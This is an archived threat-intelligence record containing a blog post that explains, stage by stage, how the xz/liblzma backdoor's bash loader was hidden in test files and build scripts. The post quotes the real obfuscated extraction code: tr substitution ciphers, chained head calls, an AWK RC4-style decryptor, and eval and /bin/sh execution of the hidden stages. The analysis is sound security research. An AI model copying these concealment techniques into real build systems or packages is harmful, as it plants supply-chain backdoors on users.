{
	"id": "e758a841-0dca-44fa-abc2-196ab47b2840",
	"created_at": "2026-04-10T03:21:38.119967Z",
	"updated_at": "2026-04-10T03:22:18.270692Z",
	"deleted_at": null,
	"sha1_hash": "d53fb36cbaf38884e23755941c5ec17c1bc4af07",
	"title": "xz/liblzma: Bash-stage Obfuscation Explained",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 270804,
	"plain_text": "xz/liblzma: Bash-stage Obfuscation Explained\r\nArchived: 2026-04-10 03:13:13 UTC\r\nYesterday Andres Freund emailed oss-security@ informing the community of the discovery of a backdoor in\r\nxz/liblzma, which affected OpenSSH server (huge respect for noticing and investigating this). Andres' email is an\r\namazing summary of the whole drama, so I'll skip that. While admittedly most juicy and interesting part is the\r\nobfuscated binary with the backdoor, the part that caught my attention – and what this blogpost is about – is the\r\ninitial part in bash and the simple-but-clever obfuscation methods used there. Note that this isn't a full description\r\nof what the bash stages do, but rather a write down of how each stage is obfuscated and extracted.\r\nP.S. Check the comments under this post, there are some good remarks there.\r\nBefore we begin\r\nWe have to start with a few notes.\r\nFirst of all, there are two versions of xz/liblzma affected: 5.6.0 and 5.6.1. Differences between them are minor, but\r\ndo exist. I'll try to cover both of these.\r\nSecondly, the bash part is split into three (four?) stages of interest, which I have named Stage 0 (that's the start\r\ncode added in m4/build-to-host.m4) to Stage 2. I'll touch on the potential \"Stage 3\" as well, though I don't think it\r\nhas fully materialized yet.\r\nPlease also note that the obfuscated/encrypted stages and later binary backdoor are hidden in two test files:\r\ntests/files/bad-3-corrupt_lzma2.xz and tests/files/good-large_compressed.lzma.\r\nStage 0\r\nAs pointed out by Andres, things start in the m4/build-to-host.m4 file. Here are the relevant pieces of code:\r\n... gl_[$1]_config='sed \\\"r\\n\\\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d\r\n2\u003e/dev/null' ... gl_path_map='tr \"\\t \\-_\" \" \\t_\\-\"' ...\r\nThis code, which I believe is run somewhere during the build process, extracts Stage 1 script. Here's an overview:\r\n1. Bytes from tests/files/bad-3-corrupt_lzma2.xz are read from the file and outputted to standard output /\r\ninput of the next step – this chaining of steps is pretty typical throughout the whole process. After\r\neverything is read a newline (\\n) is added as well.\r\n2. The second step is to run tr (translate, as in \"map characters to other characters\", or \"substitute characters to\r\ntarget characters\"), which basically changes selected characters (or byte values) to other characters (other\r\nbyte values). Let's work through a few features and examples, as this will be imporant later.\r\nThe most basic use looks like this: echo \"BASH\" | tr \"ABCD\" \"1234\" 21SH What happend here is \"A\"\r\nbeing mapped to (translated to) \"1\", \"B\" to \"2\", and so on.\r\nhttps://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nPage 1 of 7\n\nInstead of characters we can also specify ranges of characters. In our initial example we would just change\r\n\"ABCD\" to \"A-D\", and do the same with the target character set: \"1-4\": echo \"BASH\" | tr \"A-D\" \"1-4\"\r\n21SH\r\nSimilarly, instead of specyfing characters, we can specify their ASCII codes... in octal. So \"A-D\" could be\r\nchanged to \"\\101-\\104\", and \"1-4\" could become \"\\061-\\064\". echo \"BASH\" | tr \"\\101-\\104\" \"\\061-\r\n\\064\" 21SH\r\nThis can also be mixed - e.g. \"ABCD1-9\\111-\\115\" would create a set of A, B, C, D, then numbers from 1\r\nto 9, and then letters I (octal code 111), J, K, L, M (octal code 115). This is true both for the input\r\ncharacters set and the target character set.\r\nGoing back to the code, we have tr \"\\t \\-_\" \" \\t_\\-\", which does the following substitution in bytes streamed\r\nfrom the tests/files/bad-3-corrupt_lzma2.xz file:\r\n0x09 (\\t) are replaced with 0x20,\r\n0x20 (whitespace) are replaced with 0x09,\r\n0x2d (-) are replaced with 0x5f,\r\n0x5f (_) are replaced with 0x2d,\r\nThis actually \"uncorrupts\" the bad-3-corrupt_lzma2.xz, which forms a proper xz stream again.\r\n3. In the last step of this stage the fixed xz byte stream is extracted with errors being ignored (the stream\r\nseems to be truncated, but that doesn't matter as the whole meaningful output has already been written out).\r\nThe outcome of this is the Stage 1 script, which is promptly executed.\r\nBy the way...\r\nIf want to improve your binary file and protocol skills, check out the workshop I'll be running between April and\r\nJune → Mastering Binary Files and Protocols: The Complete Journey\r\nStage 1\r\nIn Andres' email that's the bash file starting with \"####Hello####\", which is pretty short, so let's present it here\r\nwith differences between 5.6.0 and 5.6.1 marked with black background.\r\n####Hello#### # a few binary bytes here, but as it's a comment they are ignorred [ ! $(uname) =\r\n\"Linux\" ] \u0026\u0026 exit 0 [ ! $(uname) = \"Linux\" ] \u0026\u0026 exit 0 [ ! $(uname) = \"Linux\" ] \u0026\u0026 exit 0 [ ! $(uname)\r\n= \"Linux\" ] \u0026\u0026 exit 0 [ ! $(uname) = \"Linux\" ] \u0026\u0026 exit 0 eval `grep ^srcdir= config.status` if test -f\r\n../../config.status;then eval `grep ^srcdir= ../../config.status` srcdir=\"../../$srcdir\" fi export i=\"\r\n((head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -\r\nc +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024\r\n\u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024\r\n\u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024\r\n\u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024\r\n\u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024\r\n\u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024\r\n\u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024 \u003e/dev/null) \u0026\u0026 head -c +2048 \u0026\u0026 (head -c +1024\r\n\u003e/dev/null) \u0026\u0026 head -c +939)\";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c\r\nhttps://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nPage 2 of 7\n\n+31233|tr \"\\114-\\321\\322-\\377\\35-\\47\\14-\\34\\0-\\13\\50-\\113\" \"\\0-\\377\")|xz -F raw --lzma1 -dc|/bin/sh\r\n####World####\r\nThe first difference are the random bytes in the comment on the second line.\r\nIn version 5.6.0 it's 86 F9 5A F7 2E 68 6A BC,\r\nand in 5.6.1 that's E5 55 89 B7 24 04 D8 17.\r\nI'm not sure if these differences are meaningful in any way, but wanted to note it.\r\nThe check whether the script is running on Linux was added in 5.6.1, and the fact that it's repeated 5 times makes\r\nthis pretty funny – was someone like \"oops, forgot this last time and it cause issues, better put it in 5 times as an\r\natonement!\"?\r\nWe'll get back to the remaining differences later, but for now let's switch to Stage 2 extraction code, which is that\r\nhuge export i=... line with a lot of heads. As previously, let's go step by step:\r\n1. The export i=... at the beginning is basically just a function \"definition\". It's being invoked in step 3 (as\r\nwell as in Stage 2), so we'll get to it in a sec (also, it's simpler than it looks).\r\n2. The first actual step in the extraction process of Stage 2 is the decompression (xz -dc) of the good-large_compressed.lzma file to standard output. This, as previously, starts a chain of outputs of one step\r\nbeing used as inputs in the next one.\r\n3. Now we get to the i function invocation (eval $i). This function is basically a chain of head calls that either\r\noutput the next N bytes, or skip (ignore) the next N bytes.\r\nAt the very beginning we have this: (head -c +1024 \u003e/dev/null) The -c +1024 option there tells head to\r\nread and output only the next 1024 bytes from the incoming data stream (note that the + there is ignored, it\r\ndoesn't do anything, unlike in tail). However, since the output is redirected in this case to /dev/null, what\r\nwe effectively get is \"skip the next 1024 bytes\".\r\nThis is a good moment to note, that if we look at the first 1024 bytes in the uncompressed data stream from\r\nthe good-large_compressed.lzma file, it's basically the \"A\" character (byte 0x41) repeated 1024 times. To\r\nadd a bit of foreshadowing, after the first 1024 characters there is some binary data.\r\nThe next head call looks almost identical, with a different length: head -c +2048 Note that in this case\r\noutput is not ignored – it will actually be passed to the next step as input.\r\nAnd this pattern repeats: 1024 bytes are ignored, than 2048 bytes are outputted, 1024 bytes ignored, 2048\r\noutputted... and so on until we get to the very end of the file where only 724 bytes (in 5.6.0) or 939 bytes\r\n(in 5.6.1) are outputted.\r\nTo visualize this, here's the actual input data that's processed by this set of head calls. Byte 0 is on top-left\r\nof the file; each column represents 256 bytes of the file as grayscale. Note the \"empty gray\" regions\r\nbetween the high entropy (\"noisy\") areas – what this part of the script does is basically just removing the\r\nempty regions and merging the regions with actual data together.\r\nhttps://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nPage 3 of 7\n\n→\r\n4. In the next step – tail -c +31233 – the initial portion of the data is discarded (spoiler: it hides the binary\r\nbackdoor, which is extracted in the next Stage, so it's not needed now). In 5.6.0 that would be the first\r\n31264 bytes and in the 5.6.1 that's 31232 (the one-off difference is because of tail -c +N means \"start\r\noutputting from byte N\" and not \"ignore first N bytes\").\r\n5. Step 5 revisits the tr command, which in this case is used as a very simple substitution cipher, with key\r\n(byte value mapping) being different in 5.6.0 and 5.6.1: 5.6.0: tr \"\\5-\\51\\204-\\377\\52-\\115\\132-\r\n\\203\\0-\\4\\116-\\131\" \"\\0-\\377\" 5.6.1: tr \"\\114-\\321\\322-\\377\\35-\\47\\14-\\34\\0-\\13\\50-\\113\" \"\\0-\r\n\\377\" As per previous explanation, this basically means that (for 5.6.0) byte of value 5 will be substitute\r\nwith byte of value 0, byte of value 6 will be substituted with byte of value 1, and so on. In each case there\r\nare 6 ranges which map to the whole 0 - 255 (that's 377 octal) range.\r\n6. In the last step the deciphered data is decompressed (xz -F raw --lzma1 -dc) and the resulting Stage 2 is\r\npromptly executed.\r\nStage 2\r\nStage 2 is the infected.txt file attached by Andres in the original email (that's the 5.6.0 version btw). There's a lot\r\ngoing on in this bash script, as this is where the actual compilation process modification happens.\r\nFrom the perspective of obfuscation analysis, there are three interesting fragments to this script, two of which\r\nappear only in the 5.6.1 version. Let's start with them, as they are also simpler.\r\nStage 2 \"extension\" mechanism\r\nFragment 1:\r\nvs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2\u003e/dev/null` if test \"x$vs\" != \"x\" \u003e /dev/null\r\n2\u003e\u00261;then f1=`echo $vs | cut -d: -f1` if test \"x$f1\" != \"x\" \u003e /dev/null 2\u003e\u00261;then start=`expr $(echo\r\n$vs | cut -d: -f2) + 7` ve=`grep -broaF '|_!{ -' $srcdir/tests/files/ 2\u003e/dev/null` if test \"x$ve\" !=\r\n\"x\" \u003e /dev/null 2\u003e\u00261;then f2=`echo $ve | cut -d: -f1` if test \"x$f2\" != \"x\" \u003e /dev/null 2\u003e\u00261;then [ !\r\nhttps://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nPage 4 of 7\n\n\"x$f2\" = \"x$f1\" ] \u0026\u0026 exit 0 [ ! -f $f1 ] \u0026\u0026 exit 0 end=`expr $(echo $ve | cut -d: -f2) - $start` eval\r\n`cat $f1 | tail -c +${start} | head -c +${end} | tr \"\\5-\\51\\204-\\377\\52-\\115\\132-\\203\\0-\\4\\116-\\131\"\r\n\"\\0-\\377\" | xz -F raw --lzma2 -dc` fi fi fi fi\r\nFragment 3:\r\nvs=`grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2\u003e/dev/null` if test \"x$vs\" != \"x\" \u003e /dev/null\r\n2\u003e\u00261;then f1=`echo $vs | cut -d: -f1` if test \"x$f1\" != \"x\" \u003e /dev/null 2\u003e\u00261;then start=`expr $(echo\r\n$vs | cut -d: -f2) + 7` ve=`grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2\u003e/dev/null` if test \"x$ve\"\r\n!= \"x\" \u003e /dev/null 2\u003e\u00261;then f2=`echo $ve | cut -d: -f1` if test \"x$f2\" != \"x\" \u003e /dev/null 2\u003e\u00261;then [\r\n! \"x$f2\" = \"x$f1\" ] \u0026\u0026 exit 0 [ ! -f $f1 ] \u0026\u0026 exit 0 end=`expr $(echo $ve | cut -d: -f2) - $start`\r\neval `cat $f1 | tail -c +${start} | head -c +${end} | tr \"\\5-\\51\\204-\\377\\52-\\115\\132-\\203\\0-\\4\\116-\r\n\\131\" \"\\0-\\377\" | xz -F raw --lzma2 -dc` fi fi fi fi\r\nThese two fragments are pretty much identical, so let's handle both of them at the same time. Here's what they do:\r\n1. First of all they try to find (grep -broaF) two files in tests/files/ directory which contain the following bytes\r\n(signature): Fragment 1: \"~!:_ W\" and \"|_!{ -\" Fragment 3: \"jV!.^%\" and \"%.R.1Z\" Note that what's\r\nactually outputted by grep in this case has the following format: file_name:offset:signature. For example:\r\n$ grep -broaF \"XYZ\" testfile:9:XYZ\r\n2. If such file is found, the offset for each file is extracted (cut -d: -f2, which takes the 2nd field assuming : is\r\nthe field delimiter), and the first offset + 7 is saved as $start, and the second offset from the second file is\r\nsaved as $end.\r\n3. Once the script has the $start and $end offsets, it carves out that part of the file-that-had-the-first-signature:\r\ncat $f1 | tail -c +${start} | head -c +${end}\r\n4. And what follows is first the substitution cipher (using the 5.6.0 version key from Stage 1 btw): tr \"\\5-\r\n\\51\\204-\\377\\52-\\115\\132-\\203\\0-\\4\\116-\\131\" \"\\0-\\377\"\r\n5. and then decompressing the data for it to be promptly executed: eval `... | xz -F raw --lzma2 -dc`\r\nNote that in neither of the investigated TAR archives (5.6.0 and 5.6.1) there were any files with any of the\r\nsignatures. This whole thing basically looks like an \"extension/patching\" system that would allow adding future\r\nscripts to be run in the context of Stage 2, without having to modify the original payload-carrying test files. Which\r\nmakes sense, as modyfing a \"bad\" and \"good\" test files over and over again is pretty suspicious. So the plan\r\nseemed to be to just add new test files instead, which would have been picked up, deciphered, and executed.\r\nStage 2 backdoor extraction\r\nAs pointed out by Andres in the original e-mail, at some point an .o file is extracted and weaved into the\r\ncompilation/linking process. The following code is responsible for that (again, differences between versions are\r\nmarked with black background):\r\nN=0 W=88664 else N=88664 W=0 fi xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed \"s/\\\r\n(.\\)/\\1\\n/g\" | LC_ALL=C awk 'BEGIN{FS=\"\\n\";RS=\"\\n\";ORS=\"\";m=256;for(i=0;i\u003cm;i++)\r\n{t[sprintf(\"x%c\",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l\u003c8192;l++){i=(i+1)%m;a=c[i];j=\r\n(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t[\"x\" (NF\u003c1?RS:$1)];i=(i+1)%m;a=c[i];j=\r\nhttps://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nPage 5 of 7\n\n(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf \"%c\",(v+k)%m}' | xz -dc --single-stream | ((head -c\r\n+$N \u003e /dev/null 2\u003e\u00261) \u0026\u0026 head -c +$W) \u003e liblzma_la-crc64-fast.o || true\r\nThe differences between versions boil down to the size of the compressed-but-somewhat-mangled payload – that's\r\n88792 in 5.6.0 and 88664 in 5.6.1 – and one value change in the AWK script, to which we'll get in a second.\r\nAs in all previous cases, the extraction process is a chain of commands, where the output of one command is the\r\ninput of the next one. Furthermore, actually some steps are identical as in Stage 1 (which makes sense, since – as\r\nI've mentioned – they binary payload resides in the previously ignored part of the \"good\" file data). Let's take a\r\nlook:\r\n1. The first step is identical as step 2 in Stage 1 – the tests/files/good-large_compressed.lzma file is being\r\nextracted with xz.\r\n2. Second step is in turn identical as step 3 in Stage 1 – that was the \"a lot of heads\" \"function\" invocation.\r\n3. And here is where things diverge. First of all, the previous output get's mangled with the sed command:\r\nLC_ALL=C sed \"s/\\(.\\)/\\1\\n/g\" What this does, is actually putting a newline character after each byte\r\n(with the exception of the new line character itself). So what we end up with on the output, is a byte-per-line situation (yes, there is a lot of mixing \"text\" and \"binary\" approaches to files in here). This is actually\r\nneeded by the next step.\r\n4. The next step is an AWK script (that's a simple scripting language for text processing) which does – as mak\r\npointed out for me – RC4...ish decription of the input stream. Here's a prettyfied version of that script:\r\nBEGIN { # Initialization part. FS = \"\\n\"; # Some AWK settings. RS = \"\\n\"; ORS = \"\"; m = 256;\r\nfor(i=0;i\u003cm;i++) { t[sprintf(\"x%key\", i)] = i; key[i] = ((i * 7) + 5) % m; # Creating the\r\ncipher key. } i=0; # Skipping 4096 first bytes of the output PRNG stream. j=0; # ↑ it's a\r\ntypical RC4 thing to do. for(l = 0; l \u003c 4096; l++) { # 5.6.1 uses 8192 instead. i = (i + 1) %\r\nm; a = key[i]; j = (j + a) % m; key[i] = key[j]; key[j] = a; } } { # Decription part. # Getting\r\nthe next byte. v = t[\"x\" (NF \u003c 1 ? RS : $1)]; # Iterating the RC4 PRNG. i = (i + 1) % m; a =\r\nkey[i]; j = (j + a) % m; b = key[j]; key[i] = b; key[j] = a; k = key[(a + b) % m]; # As pointed\r\nout by @nugxperience, RC4 originally XORs the encrypted byte # with the key, but here for some\r\nadd is used instead (might be an AWK thing). printf \"%key\", (v + k) % m }\r\n5. After the input has been decrypted, it gets decompressed: xz -dc --single-stream\r\n6. And then bytes from N (0) to W (~86KB) are being carved out using the same usual head tricks, and saved\r\nas liblzma_la-crc64-fast.o – which is the final binary backdoor. ((head -c +$N \u003e /dev/null 2\u003e\u00261) \u0026\u0026\r\nhead -c +$W) \u003e liblzma_la-crc64-fast.o\r\nBy the way...\r\nIf want to improve your binary file and protocol skills, check out the workshop I'll be running between\r\nApril and June → Mastering Binary Files and Protocols: The Complete Journey\r\nSummary\r\nSomeone put a lot of effort for this to be pretty innocent looking and decently hidden. From binary test files used\r\nto store payload, to file carving, substitution ciphers, and an RC4 variant implemented in AWK all done with just\r\nstandard command line tools. And all this in 3 stages of execution, and with an \"extension\" system to future-proof\r\nhttps://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nPage 6 of 7\n\nthings and not have to change the binary test files again. I can't help but wonder (as I'm sure is the rest of our\r\nsecurity community) – if this was found by accident, how many things still remain undiscovered.\r\nSource: https://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nhttps://gynvael.coldwind.pl/?lang=en\u0026id=782\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://gynvael.coldwind.pl/?lang=en\u0026id=782"
	],
	"report_names": [
		"?lang=en\u0026id=782"
	],
	"threat_actors": [],
	"ts_created_at": 1775791298,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d53fb36cbaf38884e23755941c5ec17c1bc4af07.pdf",
		"text": "https://archive.orkl.eu/d53fb36cbaf38884e23755941c5ec17c1bc4af07.txt",
		"img": "https://archive.orkl.eu/d53fb36cbaf38884e23755941c5ec17c1bc4af07.jpg"
	}
}